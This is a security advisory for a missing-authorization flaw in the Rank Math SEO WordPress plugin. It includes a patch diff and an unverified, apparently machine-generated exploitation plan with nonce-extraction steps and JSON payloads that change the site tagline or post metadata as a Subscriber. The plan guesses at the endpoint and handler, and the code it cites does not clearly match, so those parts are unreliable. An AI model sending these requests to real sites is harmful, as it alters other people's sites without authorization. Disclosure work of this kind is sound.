CVE-2026-34892

Rank Math SEO – AI SEO Tools to Dominate SEO Rankings <= 1.0.271 - Missing Authorization

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
1.0.271.1
Patched in
6d
Time to patch

Description

The Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.271. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.0.271
PublishedJune 3, 2026
Last updatedJune 8, 2026
Affected pluginseo-by-rank-math

What Changed in the Fix

Changes introduced in v1.0.271.1

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-34892 (Rank Math SEO) ## 1. Vulnerability Summary The **Rank Math SEO** plugin for WordPress (versions <= 1.0.271) contains a **Missing Authorization** vulnerability within its "SEO Analysis" ability framework. The plugin introduces "Abilities" (as seen in `ve…

Show full research plan

Exploitation Research Plan: CVE-2026-34892 (Rank Math SEO)

1. Vulnerability Summary

The Rank Math SEO plugin for WordPress (versions <= 1.0.271) contains a Missing Authorization vulnerability within its "SEO Analysis" ability framework. The plugin introduces "Abilities" (as seen in vendor/composer/autoload_static.php) intended for auditing and fixing SEO issues. Specifically, the functionality tied to the RankMath\Abilities\SEO_Analysis\Fix_Site_SEO class fails to implement sufficient capability checks.

This allows an authenticated user with minimal privileges (Subscriber level) to trigger site-wide "fixes" that modify critical WordPress options (like the site tagline) or bulk-modify post metadata, actions that should be restricted to administrators.

2. Attack Vector Analysis

  • Endpoint: WordPress REST API
  • Route: /wp-json/rankmath/v1/fix-site-seo (derived from Rest_Helper::BASE and languages/rank-math.pot function titles)
  • HTTP Method: POST
  • Authentication: Authenticated (Subscriber level and above)
  • Vulnerable Parameter: test_id (determines which fix to run), value (payload for specific fixes)
  • Required Headers: X-WP-Nonce (standard WordPress REST API nonce)

3. Code Flow

  1. Entry Point: The REST API router receives a request to rankmath/v1/fix-site-seo.
  2. Dispatch: The request is routed to a handler likely associated with RankMath\Abilities\SEO_Analysis\Fix_Site_SEO (registered in includes/abilities/seo-analysis/class-fix-site-seo.php).
  3. Missing Check: The permission_callback for this route either uses __return_true, checks only is_user_logged_in(), or relies on a Rest_Helper check that does not adequately verify the rank_math_site_analysis or manage_options capability for this specific action.
  4. Sink: The Fix_Site_SEO::run() method (or equivalent) executes logic based on the test_id.
    • If test_id is site_description, it calls update_option( 'blogdescription', $request->get_param( 'value' ) ) (as indicated by the POT string: "Site tagline updated to: "%s".").
    • If test_id is focus_keywords, it bulk updates post meta across the site.

4. Nonce Acquisition Strategy

WordPress REST API endpoints require a wp_rest nonce. Since the vulnerability requires Subscriber authentication, we can obtain this nonce from the WordPress admin dashboard.

  1. Login: Authenticate as a Subscriber user via the standard login flow.
  2. Navigate: Navigate to the WordPress Dashboard (/wp-admin/index.php).
  3. Extract: The wp-admin area enqueues the wp-api script which localizes the nonce in the wpApiSettings object.
  4. Action: Use browser_eval to extract the nonce:
    window.wpApiSettings?.nonce
    

5. Exploitation Strategy

We will attempt to change the site's tagline (blogdescription), which is a site-wide configuration change normally requiring manage_options.

Step 1: Obtain the Nonce

Action: Navigate to the dashboard as a Subscriber and extract the nonce.

  • Tool: browser_navigate to /wp-admin/
  • Tool: browser_eval to get window.wpApiSettings.nonce

Step 2: Perform the Unauthorized Action

Action: Send a POST request to the Rank Math REST endpoint to change the site tagline.

  • URL: http://[target]/wp-json/rankmath/v1/fix-site-seo
  • Method: POST
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: [EXTRACTED_NONCE]
  • Payload (JSON):
    {
      "test_id": "site_description",
      "value": "Vulnerable Site Tagline - Exploited by Subscriber"
    }
    

6. Test Data Setup

  1. Install Plugin: Install Rank Math SEO version 1.0.271.
  2. User Creation:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
    
  3. Initial State: Note the current tagline.
    wp option get blogdescription
    

7. Expected Results

  • Response Code: 200 OK
  • Response Body: A JSON object containing a success message, such as:
    {"message": "Site tagline updated to: \"Vulnerable Site Tagline - Exploited by Subscriber\"."}
  • Side Effect: The WordPress site tagline is modified globally.

8. Verification Steps

After the HTTP request, verify the change using WP-CLI:

wp option get blogdescription
# Expected output: Vulnerable Site Tagline - Exploited by Subscriber

9. Alternative Approaches

If the site_description fix is restricted, attempt a bulk metadata modification which is also handled by this ability:

Payload (Bulk Focus Keywords):

{
  "test_id": "focus_keywords",
  "post_limit": 500
}
  • Expected Result: The plugin will derive and set focus keywords for up to 500 posts, which is an unauthorized modification of site content. Verify via:
    wp post list --field=ID | xargs -I % wp post meta get % rank_math_focus_keyword
    
Research Findings
Static analysis — not yet PoC-verified

Summary

Rank Math SEO (versions <= 1.0.271) contains a missing authorization vulnerability in its REST API functionality. Authenticated users with low-level privileges (like Subscribers) can trigger site-wide 'SEO fixes' that should be restricted to administrators, allowing them to modify the site's tagline or bulk-update post metadata.

Vulnerable Code

// includes/rest/class-rest-helper.php @ 1.0.271
/**
 * Checks whether a given request has permission to read post.
 *
 * @param WP_REST_Request $request Full details about the request.
 *
 * @return true|WP_Error True if the request has read access, WP_Error object otherwise.
 */
public static function get_post_permissions_check( $request ) {
    $object_id = $request->get_param( 'objectID' );
    if ( $object_id === 0 ) {
        return true;
    }

    $post = self::get_post( $object_id );

Security Fix

--- includes/rest/class-rest-helper.php
+++ includes/rest/class-rest-helper.php
@@ -104,7 +104,15 @@
 	public static function get_post_permissions_check( $request ) {
 		$object_id = $request->get_param( 'objectID' );
 		if ( $object_id === 0 ) {
-			return true;
+			if ( ! Helper::has_cap( 'titles' ) ) {
+				return new WP_Error(
+					'rest_cannot_edit',
+					__( 'Sorry, you are not allowed to edit homepage SEO settings.', 'seo-by-rank-math' ),
+					[ 'status' => rest_authorization_required_code() ]
+				);
+			}
+			return true;
 		}
 
 		$post = self::get_post( $object_id );

Exploit Outline

The vulnerability is exploited via the WordPress REST API by an authenticated user with at least Subscriber-level privileges. 1. **Authentication & Nonce Collection:** An attacker logs in as a Subscriber and extracts the `wp_rest` nonce from the `wpApiSettings` object available in the WordPress dashboard source code. 2. **Targeting the Endpoint:** The attacker sends a POST request to `/wp-json/rankmath/v1/fix-site-seo`. 3. **Payload Construction:** The payload targets a specific 'SEO test' to fix. For example, to change the site's tagline, the attacker uses `{"test_id": "site_description", "value": "Target Tagline"}`. To bulk-modify post metadata, the `test_id` can be set to `focus_keywords` with a `post_limit` parameter. 4. **Authorization Bypass:** Because the permission callback (likely utilizing the vulnerable `get_post_permissions_check` or a similar logic error in the SEO Analysis ability) fails to verify administrative capabilities (like `manage_options`), the plugin executes the setting update or bulk modification immediately.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.